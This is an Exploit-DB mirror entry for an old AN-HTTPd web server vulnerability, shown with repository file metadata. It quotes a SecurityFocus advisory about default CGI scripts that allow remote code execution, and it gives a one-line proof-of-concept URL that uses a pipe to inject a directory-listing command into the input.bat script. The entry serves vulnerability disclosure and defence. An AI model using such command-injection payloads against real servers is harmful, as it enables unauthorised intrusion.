exploit-db-mirror/exploits/windows/remote/19587.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

5 lines
No EOL
278 B
Text

source: http://www.securityfocus.com/bid/762/info
Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data.
http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows